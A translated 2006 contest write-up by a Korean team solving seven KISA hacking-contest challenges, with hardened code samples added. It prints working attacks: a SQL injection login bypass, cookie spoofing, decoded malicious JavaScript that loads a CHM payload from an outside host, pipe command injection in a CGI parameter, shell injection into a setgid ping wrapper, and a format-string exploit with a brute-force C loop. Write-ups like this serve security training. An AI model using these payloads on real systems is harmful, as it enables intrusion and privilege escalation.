+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
KISA 3rd Hacking/Defense Contest: Preliminary Problem Solutions
5Zone Team Report
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
· Contest period : 2006. 5.16 (Tue) ~ 2006. 5.17 (Wed)
· Written on : 2006. 5.17 (Wed)
· Author : xCuter
· Team members : 최진욱 (usapmuzae), 박병익 (pbi12), xCuter
· Web vulnerabilities : problems 1 ~ 4 (4 problems)
· System vulnerabilities : problems 5 ~ 7 (3 problems)
1. Problem : A vulnerability that arises during web authentication.
Solution : We tried a SQL injection attack, but it only logged us in as the guest account.
It looked as though the SQL injection could be pushed further, but sniffing the HTTP traffic showed that once logged in as guest,
the following cookie value had been set:
" Cookie: User_ID: <logged-in ID> "
So the problem could be solved with cookie spoofing, changing the logged-in ID to admin:
" Cookie: User_ID: admin "
Setting the cookie as above and sending it to the server gives the same privileges as logging in as admin, and among the information then displayed we obtained the administrator password.
Password : U can fly
2. Problem : The administrator found the hole in the cookie-based authentication and fixed it.
However, they did not notice the vulnerability in the web login itself.
Use it to view the administrator page and obtain the password for the next stage.
The URL is http://solve.hdcon.or.kr/Administrator/login.html.
Solution : Entering a ' character (single quote mark) produced a MySQL error, so we immediately recognized SQL injection and
started attacking. The page source showed that the input tags for ID and PW were limited with maxlength=8, so to get around this we could either
a. rebuild the same form and source on our own machine, with the form tag's action pointing at the contest server's login.php (the login handler) and the maxlength
limit removed, or
b. use a proxy program to modify ID and PW as the packet is sent to the server.
Using methods a and b above, we attempted the attack as follows.
Attack attempt : Only 8 characters were allowed, but inserting "or" to bypass the password made the string too long, so
we used a comment instead; since the database was MySQL, comments such as '--' and '#' could not be used, and '/*' was used instead.
That is, the input had to take the form 'SQL of at most 6 characters + 2-character comment'.
Answer : '=''/*
Confirmed password : pw : vkdlxld!!! (파이팅!!!)
3. Problem : In connection with the recent wave of attacks from China, the site's js file seems to keep getting tampered with. Analyze it, check the information the attacker left behind,
and obtain the password for the next stage. The suspicious file is http://solve.hdcon.or.kr/modified_js/browser.js.
Solution : Looking at the browser.js file, the following code shows that a particular htm file is being loaded:
document.write('<iframe height=0 width=0 src="http://solve.hdcon.or.kr/chinaatt/kor.htm"></iframe>');
Opening that file reveals the following source.
===============================================================================================================================
<script>
<!--
document.write(unescape("%3CSCRIPT%20LANGUAGE%3D%22JavaScript%22%3E%0D%0A%3C%21--%0D
%0Avar%20HtmlStrings%3D%5B%22%3DPCKFDU%21Xjeui%3E1%21Ifjhiu%3E1%21tuzmf%3E%23ejtqmbz
%3Bopof%3C%23%21uzqf%3E%23ufyu0y.tdsj%22%2C%22qumfu%23%21ebub%3E%23nl%3BANTJUTupsf
%3Bniunm%3Bd%3B%5D/niu%01iuuq%3B00329/4/319/294%22%2C%220rrr0ifmq/uyu%3B%3B0%2634%2
63F%2679%2685n%23%02%3E%3D0PCKFDU%02%3E%0E%0B%22%5D%3B%0D%0Afunction%20psw%2
8st%29%7B%0D%0A%20%20var%20varS%3B%0D%0A%20%20varS%3D%22%22%3B%0D%0A%20%20v
ar%20i%3B%0D%0A%20%20for%28var%20a%3D0%3Ba%3Cst.length%3Ba++%29%7B%0D%0A%20%20
%20%20i%20%3D%20st.charCodeAt%28a%29%3B%20%0D%0A%20%20%20%20if%20%28i%3D%3D1%
29%20%0D%0A%20%20%20%20%20%20varS%3DvarS+String.fromCharCode%28%27%22%27.charCode
At%28%29-1%29%3B%0D%0A%20%20%20%20else%20if%20%28i%3D%3D2%29%20%7B%0D%0A%20
%20%20%20%20%20a++%3B%0D%0A%20%20%20%20%20%20varS+%3DString.fromCharCode%28st.ch
arCodeAt%28a%29%29%3B%0D%0A%20%20%20%20%20%20%7D%0D%0A%20%20%20%20else%0D%
0A%20%20%20%20%20%20varS+%3DString.fromCharCode%28i-1%29%3B%0D%0A%20%20%7D%0D%0A
%20%20return%20varS%3B%0D%0A%7D%3B%0D%0Avar%20num%3D3%3B%0D%0Afunction%20S%28%
29%7B%0D%0Afor%28i%3D0%3Bi%3Cnum%3Bi++%29%0D%0A%20%20document.write%28psw%28HtmlS
trings%5Bi%5D%29%29%3B%7D%0D%0AS%28%29%3B%0D%0A//%20--%3E%0D%0A%3C/SCRIPT%3E%0
D%0A%0D%0A"));
//-->
</script>
===============================================================================================================================
Decoding this file once more gives:
===============================================================================================================================
<SCRIPT LANGUAGE="JavaScript">
<!--var HtmlStrings=["=PCKFDU!Xjeui>1!Ifjhiu>1!tuzmf>#ejtqmbz;opof<#!uzqf>#ufyu0y.tdsj","qumfu#!ebub>#nl;ANTJUTupsf;niunm;d;]/niuiuuq;00tpmwf/","lotq/psh0dijobbuu0ifmq/uyu;;0&35&3F&79&85n#>=0PCKFDU> "];function psw(st){ var varS; varS=""; var i; for(var a=0;a<st.length;a++){ i = st.charCodeAt(a); if (i==1) varS=varS+String.fromCharCode('"'.charCodeAt()-1); else if (i==2) { a++; varS+=String.fromCharCode(st.charCodeAt(a)); } else varS+=String.fromCharCode(i-1); } return varS;};var num=3;function S(){for(i=0;i<num;i++) document.write(psw(HtmlStrings[i]));}S();// --></SCRIPT>
===============================================================================================================================
It was a JavaScript page containing an encoded string.
Tidied up for readability, it reads as follows:
===============================================================================================================================
<SCRIPT LANGUAGE="JavaScript">
var HtmlStrings=["=PCKFDU!Xjeui>1!Ifjhiu>1!tuzmf>#ejtqmbz;opof<#!uzqf>#ufyu0y.tdsj","qumfu#!ebub>#nl;ANTJUTupsf;niunm;d;]/niuiuuq;00tpmwf/","lotq/psh0dijobbuu0ifmq/uyu;;0&35&3F&79&85n#>=0PCKFDU>"];
// Decoder: a 0x01 byte becomes '!', a 0x02 byte means "emit the next byte unchanged",
// every other byte is shifted down by one.
function psw(st)
{
    var varS;
    varS="";
    var i;
    for(var a=0;a<st.length;a++)
    {
        i = st.charCodeAt(a);
        if (i==1)
            varS=varS+String.fromCharCode('"'.charCodeAt()-1);
        else if (i==2)
        {
            a++;
            varS+=String.fromCharCode(st.charCodeAt(a));
        }
        else
            varS+=String.fromCharCode(i-1);
    }
    return varS;
}
// Decode every entry and write the result straight into the page.
function S()
{
    var num=HtmlStrings.length;
    for(i=0;i<num;i++)
        document.write(psw(HtmlStrings[i]));
}
S();
</SCRIPT>
===============================================================================================================================
Decoding the strings in the HtmlStrings variable produces the following string:
<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:\.mht!http://solve.knsp.org/chinaatt/help.txt::/%24%2E%68%74m"></OBJECT>
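A C re-implementation of the psw() routine above, added here as an example and not part of the original writeup, which decodes the three HtmlStrings entries offline instead of writing them into a page. The 0x01 and 0x02 control bytes that the tidied listing dropped are restored at the positions the %-encoded original shows (%01 after "niu", %02 before each of the two trailing ">").

```c
#include <stdio.h>
#include <string.h>

/* The three HtmlStrings entries from the tidied listing, with the two control
 * bytes the obfuscator depends on (0x01 and 0x02) restored at the positions
 * the %-encoded original shows; the listing dropped them as unprintable. */
static const char *const html_strings[] = {
    "=PCKFDU!Xjeui>1!Ifjhiu>1!tuzmf>#ejtqmbz;opof<#!uzqf>#ufyu0y.tdsj",
    "qumfu#!ebub>#nl;ANTJUTupsf;niunm;d;]/niu\x01iuuq;00tpmwf/",
    "lotq/psh0dijobbuu0ifmq/uyu;;0&35&3F&79&85n#\x02>=0PCKFDU\x02>",
};

/* Port of psw(): 0x01 -> '!', 0x02 -> copy the next byte verbatim,
 * anything else -> byte minus one.  Returns bytes written (without the
 * terminating NUL), or -1 if out is too small. */
static int psw_decode(const char *st, char *out, size_t outlen)
{
    size_t n = 0;
    if (outlen == 0)
        return -1;
    for (size_t a = 0; st[a] != '\0'; a++) {
        unsigned char i = (unsigned char)st[a];
        char c;
        if (i == 1) {
            c = '"' - 1;                 /* '!' */
        } else if (i == 2) {
            a++;                         /* escape: next byte is literal */
            if (st[a] == '\0')
                break;
            c = st[a];
        } else {
            c = (char)(i - 1);
        }
        if (n + 1 >= outlen)
            return -1;
        out[n++] = c;
    }
    out[n] = '\0';
    return (int)n;
}

/* What S() would document.write(): all entries decoded and concatenated.
 * Returns a static buffer, or NULL if the result does not fit. */
static const char *decoded_payload(void)
{
    static char out[512];
    size_t used = 0;
    for (size_t k = 0; k < sizeof html_strings / sizeof html_strings[0]; k++) {
        int n = psw_decode(html_strings[k], out + used, sizeof out - used);
        if (n < 0)
            return NULL;
        used += (size_t)n;
    }
    return out;
}

int main(void)
{
    const char *tag = decoded_payload();
    puts(tag ? tag : "decode failed");   /* inspect the hidden tag; never execute it */
    return tag ? 0 : 1;
}
```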
However, the solve.knsp.org URL was dead, so we changed the URL to solve.hdcon.or.kr, which returned what looked like a help file in ITSF format.
Saving this as help.chm and opening it launched the Online Help program, which showed nothing but a single table-of-contents entry named '제3회해킹방어대회 $.htm'.
At that point, checking the process list showed that sending.exe was running. Before analyzing sending.exe in detail, we examined the text strings contained in the executable
and found the following string:
nslookup level4_password_is_ch!neseh4cker www.knsp.org
It runs nslookup, and the level 4 password appears as the query.
Answer : ch!neseh4cker
4. Problem : There is a download page, and it has a vulnerability that allows access to system resources.
Solution : Looking at the download HTML page, files are fetched as /cgi-bin/download.cgi?f_name=A_Project.ppt. Assuming a download vulnerability,
we tried changing the A_Project.ppt file name to download system files, but, apparently because of a cookie check, all we got was a message saying that only administrators may download.
We also tried guessing the cookie value, but decided it had to be something else; the f_name parameter looked unusual, so we suspected command execution, and that turned out to be right.
GET /cgi-bin/download.cgi?f_name=AAAA|ls| HTTP/1.0
-> cgi-lib1.pl
data
download.cgi
GET /cgi-bin/download.cgi?f_name=AAAA|ls%20-al%20data| HTTP/1.0
-> .............. ._READ_ME.TXT
GET /cgi-bin/download.cgi?f_name=AAAA|cat%20data/._READ_ME.TXT| HTTP/1.0
-> http://solve.hdcon.or.kr/cgi-bin/data/._READ_ME.TXT
HTTP/1.1 200 OK
Date: Tue, 16 May 2006 04:28:01 GMT
Server: Apache/1.3.35 (Unix) PHP/5.1.4
Connection: close
Content-Type: application/x-cgklyk
Congratulations. You have passed all the web-related problems.
Please log in with an SSH client program before proceeding to the remaining problems.
The login ID and password can be found on the problem page.
Good luck.
The password for this stage is "Are you ready?".
5. Problem : The system administrator wrote a simple program to check servers; it runs /sbin/ping by its absolute path.
But someone used a vulnerability in it to embarrass the administrator. Use it to obtain the password for the next stage.
The account below is the ID and password for connecting to solve.hdcon.or.kr to solve problems 5 ~ 7.
Connect to the system with ssh (port 8000).
ID : user02
PW : 8102746045
Solution : · System information
FreeBSD solve.hdcon.or.kr 5.4-RELEASE FreeBSD 5.4-RELEASE #0: Sun May 8 10:21:06 UTC 2005 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
· Search
To obtain the level5 account, we looked among the setuid/setgid files for those whose owner or group is level5.
$ find / -group level5 -exec ls -al {} \; 2>/dev/null
-rwxr-sr-x 1 root level5 5135 May 11 03:13 /usr/local/sbin/pong
· Analysis
Dump of assembler code for function main:
0x0804858c <main+0>: push %ebp
0x0804858d <main+1>: mov %esp,%ebp
0x0804858f <main+3>: sub $0xd8,%esp ' lower esp by 216 bytes to reserve stack space
0x08048595 <main+9>: and $0xfffffff0,%esp
0x08048598 <main+12>: mov $0x0,%eax
0x0804859d <main+17>: add $0xf,%eax
0x080485a0 <main+20>: add $0xf,%eax
0x080485a3 <main+23>: shr $0x4,%eax
0x080485a6 <main+26>: shl $0x4,%eax
0x080485a9 <main+29>: sub %eax,%esp
0x080485ab <main+31>: cmpl $0x1,0x8(%ebp) ' if ebp+8 (argc) == 1
0x080485af <main+35>: jle 0x80485e4 <main+88> ' jmp main+88
0x080485b1 <main+37>: sub $0x4,%esp
0x080485b4 <main+40>: mov 0xc(%ebp),%eax ' argv[0] -> %eax
0x080485b7 <main+43>: add $0x4,%eax ' argv[1] -> %eax
0x080485ba <main+46>: pushl (%eax) ' push argv[1]
0x080485bc <main+48>: push $0x804867c ' push "/sbin/ping %s"
0x080485c1 <main+53>: lea 0xffffff28(%ebp),%eax ' &buf = ebp-216 -> %eax
0x080485c7 <main+59>: push %eax ' push buf[216]
0x080485c8 <main+60>: call 0x804842c ' call sprintf()
0x080485cd <main+65>: add $0x10,%esp
0x080485d0 <main+68>: sub $0xc,%esp
0x080485d3 <main+71>: lea 0xffffff28(%ebp),%eax ' &buf = ebp-216 -> %eax
0x080485d9 <main+77>: push %eax ' push buf[216]
0x080485da <main+78>: call 0x804840c ' call system() <- the vulnerability
0x080485df <main+83>: add $0x10,%esp
0x080485e2 <main+86>: jmp 0x80485f9 <main+109>
0x080485e4 <main+88>: sub $0x8,%esp
0x080485e7 <main+91>: mov 0xc(%ebp),%eax ' ebp+c (argv[0]) -> %eax
0x080485ea <main+94>: pushl (%eax) ' push argv[0]
0x080485ec <main+96>: push $0x804868c ' push "usage : %s HOST_NAME(or HOST_IP)\n"
0x080485f1 <main+101>: call 0x80483fc ' call printf()
0x080485f6 <main+106>: add $0x10,%esp
0x080485f9 <main+109>: leave
0x080485fa <main+110>: ret
0x080485fb <main+111>: nop
------------------------- Converted to source -------------------------
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    char buf[216];
    if(argc==1)
        printf("usage : %s HOST_NAME(or HOST_IP)\n", argv[0]);
    else
    {
        /* argv[1] is pasted into a shell command line without any check */
        sprintf(buf, "/sbin/ping %s", argv[1]);
        system(buf);   /* runs through sh with the setgid group: the vulnerability */
    }
    return 0;
}
---------------------------------------------------------------
This pong program has two vulnerabilities.
The first is a buffer overflow,
and the second is the unsafe use of the system() function.
Since time matters during the contest, our team chose the second, easier route.
Functions that execute system commands, such as system(), demand particular care, because in many cases an attacker can
run commands of their choosing; in this problem the trouble is that the value could be supplied directly as an argument.
system("/sbin/ping localhost;id") <- If the user supplies input of this form, the setgid pong program
ends up running the id command as well, with that group's privileges. So we exploited it by executing a shell using characters such as ';', '&&', '`', '|'.
· Exploit
whoami is used as the argument to the /sbin/ping program, and because of the ';' sh runs after ping finishes, which drops us into a shell.
$ /usr/local/sbin/pong "whoami;sh"
ping: cannot resolve whoami: No address associated with name
$ id
uid=1003(user02) gid=1003(user02) egid=500(level5) groups=500(level5), 1003(user02)
$ cat /etc/passwd|grep level5
level5:*:500:500:User &:/export/home/level5:/sbin/nologin
$ cd /export/home/level5
$ ls
LEVEL5_ANSWER
$ cat *
Congratulations!!
Level5's password : table_tennis
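A hardened version of pong, added here as an example (not the contest binary), that validates the host argument and runs /sbin/ping through execl() with an argument vector, so no shell ever parses the input. The character whitelist, the setgid drop and the "-c 3" bound are assumptions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Accept only what a host name or IP literal is made of: letters, digits,
 * '.', '-' and ':'. Shell metacharacters (';', '|', '`', '&', spaces...)
 * never pass, and a leading '-' is refused so ping cannot read it as an option.
 * The exact whitelist is this example's assumption. */
static int is_safe_host(const char *host)
{
    size_t len = host ? strlen(host) : 0;
    if (len == 0 || len > 253 || host[0] == '-')
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!(isalnum(c) || c == '.' || c == '-' || c == ':'))
            return 0;
    }
    return 1;
}

/* Run /sbin/ping with host as one argv element via execl(): no shell parses
 * the string, so "localhost;id" would reach ping as a literal name (and is
 * rejected by the whitelist anyway). Returns ping's exit status, or -1 on a
 * rejected host or a fork/wait failure. "-c 3" is an assumed bound. */
static int run_ping(const char *host)
{
    if (!is_safe_host(host))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0)   /* drop the setgid group before anything runs */
            _exit(127);
        execl("/sbin/ping", "ping", "-c", "3", host, (char *)NULL);
        _exit(127);                  /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "usage : %s HOST_NAME(or HOST_IP)\n", argv[0]);
        return 1;
    }
    int rc = run_ping(argv[1]);
    if (rc < 0)
        fprintf(stderr, "host argument rejected or ping could not be run\n");
    return rc == 0 ? 0 : 1;
}
```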
6. Problem : There is a program for leaving messages for users.
However, this program has a vulnerability; use it to obtain the next level's privileges.
Solution : · Search
$ find / -group level6 -exec ls -al {} \; 2>/dev/null
-rwxr-sr-x 1 root level6 5546 May 16 09:58 /usr/local/bin/savemsg
· Analysis
We tried a BOF, but proper checks were in place and it failed; entering %x printed particular stack values, confirming a format string bug.
Dump of assembler code for function main:
0x0804864c <main+0>: push %ebp
0x0804864d <main+1>: mov %esp,%ebp
0x0804864f <main+3>: sub $0x48,%esp
0x08048652 <main+6>: and $0xfffffff0,%esp
0x08048655 <main+9>: mov $0x0,%eax
0x0804865a <main+14>: add $0xf,%eax
0x0804865d <main+17>: add $0xf,%eax
0x08048660 <main+20>: shr $0x4,%eax
0x08048663 <main+23>: shl $0x4,%eax
0x08048666 <main+26>: sub %eax,%esp
0x08048668 <main+28>: sub $0x4,%esp
0x0804866b <main+31>: push $0x34 ' push 0x34 (52)
0x0804866d <main+33>: push $0x0 ' push 0x0 (0)
0x0804866f <main+35>: lea 0xffffffb8(%ebp),%eax ' ebp-72 -> %eax
0x08048672 <main+38>: push %eax ' push ebp-72 = buf[52]
0x08048673 <main+39>: call 0x8048454 ' memset(buf, 0, 52);
0x08048678 <main+44>: add $0x10,%esp
0x0804867b <main+47>: sub $0xc,%esp
0x0804867e <main+50>: push $0x80487a3 ' "\nLevel 6\n\n"
0x08048683 <main+55>: call 0x8048434 ' call printf()
0x08048688 <main+60>: add $0x10,%esp
0x0804868b <main+63>: sub $0xc,%esp
0x0804868e <main+66>: push $0x80487ae ' "메세지를 남기세요.\n" ("Leave a message.")
0x08048693 <main+71>: call 0x8048434 ' call printf()
0x08048698 <main+76>: add $0x10,%esp
0x0804869b <main+79>: sub $0x4,%esp
0x0804869e <main+82>: push $0x32 ' push 0x32 (50)
0x080486a0 <main+84>: lea 0xffffffb8(%ebp),%eax ' ebp-72 -> %eax
0x080486a3 <main+87>: push %eax ' push buf[52]
0x080486a4 <main+88>: push $0x0 ' push 0x0 (0)
0x080486a6 <main+90>: call 0x8048444 ' call read(0, buf, 50);
0x080486ab <main+95>: add $0x10,%esp
0x080486ae <main+98>: sub $0xc,%esp
0x080486b1 <main+101>: push $0x80487c4 ' "다음의 메세지를 남기셨습니다.\n" ("You left the following message.")
0x080486b6 <main+106>: call 0x8048434 ' call printf()
0x080486bb <main+111>: add $0x10,%esp
0x080486be <main+114>: sub $0xc,%esp
0x080486c1 <main+117>: lea 0xffffffb8(%ebp),%eax ' ebp-72 -> %eax
0x080486c4 <main+120>: push %eax ' push buf[52]
0x080486c5 <main+121>: call 0x80485c4 <print_msg> ' call print_msg(buf);
0x080486ca <main+126>: add $0x10,%esp
0x080486cd <main+129>: sub $0xc,%esp
0x080486d0 <main+132>: push $0x80487e3 ' "\n이용해주셔서 감사합니다.\n\n" ("Thank you for using this.")
0x080486d5 <main+137>: call 0x8048434 ' call printf();
0x080486da <main+142>: add $0x10,%esp
0x080486dd <main+145>: leave
0x080486de <main+146>: ret
0x080486df <main+147>: nop
Dump of assembler code for function print_msg:
0x080485c4 <print_msg+0>: push %ebp
0x080485c5 <print_msg+1>: mov %esp,%ebp
0x080485c7 <print_msg+3>: sub $0x88,%esp
0x080485cd <print_msg+9>: movl $0x1,0xfffffff4(%ebp) ' ebp-12 buf1[4]=1, dum[4], dum[4], ebp
0x080485d4 <print_msg+16>: movl $0x2,0xffffffa4(%ebp) ' ebp-92 buf2[4]=2
0x080485db <print_msg+23>: movl $0x3,0xffffffa0(%ebp) ' ebp-96 buf3[4]=3
0x080485e2 <print_msg+30>: movl $0x4,0xffffff9c(%ebp) ' ebp-100 buf4[4]=4
0x080485e9 <print_msg+37>: movl $0x5,0xffffff98(%ebp) ' ebp-104 buf5[4]=5
0x080485f0 <print_msg+44>: movl $0x6,0xffffff94(%ebp) ' ebp-108 buf6[4]=6
0x080485f7 <print_msg+51>: movl $0x7,0xffffff90(%ebp) ' ebp-112 buf7[4]=7
0x080485fe <print_msg+58>: movl $0x8,0xffffff8c(%ebp) ' ebp-116 buf8[4]=8
0x08048605 <print_msg+65>: movl $0x9,0xffffff88(%ebp) ' ebp-120 buf9[4]=9
0x0804860c <print_msg+72>: movl $0xa,0xffffff84(%ebp) ' ebp-124 buf10[4]=10
0x08048613 <print_msg+79>: sub $0x4,%esp
0x08048616 <print_msg+82>: push $0x34 ' push 0x34 (52)
0x08048618 <print_msg+84>: push $0x0 ' push 0x0 (0)
0x0804861a <print_msg+86>: lea 0xffffffa8(%ebp),%eax ' ebp-88 -> %eax
0x0804861d <print_msg+89>: push %eax ' push buf[52]
0x0804861e <print_msg+90>: call 0x8048454 ' call memset(buf[52], 0, 52);
0x08048623 <print_msg+95>: add $0x10,%esp
0x08048626 <print_msg+98>: sub $0x8,%esp
0x08048629 <print_msg+101>: pushl 0x8(%ebp) ' push first argument (the message passed from main)
0x0804862c <print_msg+104>: lea 0xffffffa8(%ebp),%eax ' ebp-88 -> %eax
0x0804862f <print_msg+107>: push %eax ' push buf[52]
0x08048630 <print_msg+108>: call 0x8048424 ' strcpy(buf, msg);
0x08048635 <print_msg+113>: add $0x10,%esp
0x08048638 <print_msg+116>: sub $0xc,%esp
0x0804863b <print_msg+119>: lea 0xffffffa8(%ebp),%eax ' ebp-88 -> %eax
0x0804863e <print_msg+122>: push %eax ' push buf[52]
0x0804863f <print_msg+123>: call 0x8048434 ' call printf(buf) <- the vulnerability
0x08048644 <print_msg+128>: add $0x10,%esp
0x08048647 <print_msg+131>: leave
0x08048648 <print_msg+132>: ret
0x08048649 <print_msg+133>: lea 0x0(%esi),%esi
· Exploit
- Determine the distance between the buffer holding the input and %esp at the time it is printed
- Confirmed that the input value comes out after the 16th pop
================================================================================================================
$ ./f
Level 6
메세지를 남기세요.
AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
다음의 메세지를 남기셨습니다.
AAAAbfbfec58341bfbfeb6000a9876543241414141
이용해주셔서 감사합니다.
$
================================================================================================================
dtors : 0x80498fc ( 0x8049900 , 0x8049902 <- unusable because of the 0x00 byte )
got : 0x8049908 ( 0x8049908 , 0x804990a <- unusable because of the 0x0a byte )
ret : 0xbfbfe13c ( can be located from the addresses on the stack that get popped )
shell : 0xbfbfec58 ( ec58(60504) - 0x10(16) = ec48(60488), 1bfbf-ec58=d367(54119) )
$ objdump -h f|grep dtor
15 .dtors 00000008 080498fc 080498fc 000008fc 2**2
$ objdump -h f|grep got
17 .got 00000028 08049908 08049908 00000908 2**2
$ ./.e ( egg shell for FreeBSD )
Using address: 0xbfbfec58
$ (perl -e 'print "zzzz\x3c\xe1\xbf\xbfzzzz\x3e\xe1\xbf\xbf%16\$60488c%17\$n%18\$54119c%19\$n"';cat)|./f
~~~
~~~
~~~
~~~
~~~
~~~
id
uid=1003(user02) gid=1003(user02) egid=600(level6) groups=600(level6), 1003(user02)
pwd
cd /export/home/level6
ls
LEVEL6_ANSWER
cat *
Congratulations!!
Level6's password : Bmore_Peppers
· Automatic exploit code by xCuter
/********** exploit code for the vuln prog ********/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    long j,i;
    char buf[500];
    for(i=0xe0;i<0xff;i+=0x01)
    {
        for(j=0x00;j<0xff;j+=0x02)
        {
            memset(buf, 0, 500);
            sprintf(buf, "(perl -e 'print \"zzzz\\x%02lx\\x%02lx\\xbf\\xbfzzzz\\x%02lx\\x%02lx\\xbf\\xbf%%16\\$60488c%%17\\$n%%18\\$54119c%%19\\$n\"';cat)|./f",j,i,j+0x02,i);
            printf("%s\n\n",buf);
            system(buf);
        }
    }
    return 0;
}
/********** just cut here ********/
- Using Saerom DataMan, we put a string that appears in the attack output into an auto-response, so the attack proceeds on its own until a shell drops.
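A hardened print_msg(), added here as an example rather than taken from the contest binary: the message is passed as a %s argument instead of being used as the format string, and the copy into the 52-byte buffer is bounded. count_directives() is an assumed helper for flagging input that carries conversions such as %x or %n.

```c
#include <stdio.h>
#include <string.h>

#define MSG_LEN 52   /* same buffer size as the original print_msg() */

/* Detection helper (an assumption of this example): count printf conversions
 * in a message so suspicious input can be logged. "%%" is a literal percent. */
static int count_directives(const char *msg)
{
    int n = 0;
    for (const char *p = msg; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {
            p++;
            continue;
        }
        if (p[1] != '\0')
            n++;
    }
    return n;
}

/* H\u0061rdened print_msg(): the user string is only ever a %s argument, never the
 * format, and the copy is bounded; "%x" or "%n" in the input is printed as text.
 * Returns the echoed text (static buffer) so the result can be checked. */
static const char *print_msg_safe(const char *msg)
{
    static char buf[MSG_LEN];
    memset(buf, 0, sizeof buf);
    strncpy(buf, msg, sizeof buf - 1);   /* at most 51 bytes, always NUL-terminated */
    if (count_directives(buf) > 0)
        fprintf(stderr, "[warn] message contains %d format directives\n",
                count_directives(buf));
    printf("%s\n", buf);                 /* fixed format; gcc -Wformat-security flags printf(buf) */
    return buf;
}

int main(void)
{
    /* the probe string used in the session above, constructed inline */
    char line[MSG_LEN] = "AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x";
    print_msg_safe(line);
    return 0;
}
```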
7. Problem : The administrator developed a program that is said to hide the password using an encryption technique.
Analyze this program and obtain the password.
Solution : · Search
find / -group level7 -exec ls -al {} \; 2>/dev/null
-rwxr-sr-x 2 root level7 6227 May 11 03:09 /usr/sbin/reverse
· Analysis
CRYPTED STR : b416AHqnsisAU
- We could tell it was DES-based, and also confirmed that it starts with b4
- Disassembly -> preset_passwd() function - no time, so later. (We wanted to watch it while it ran, but we have no BSD server--)
The string is present verbatim inside the preset_passwd() function
· Answer : b4ck 4ttack
$ ./f
Password: b4ck 4ttack
Congratulations !!
$
** Afterword **
It was fun. Good work, everyone. ^^; Now only the finals remain...!! haha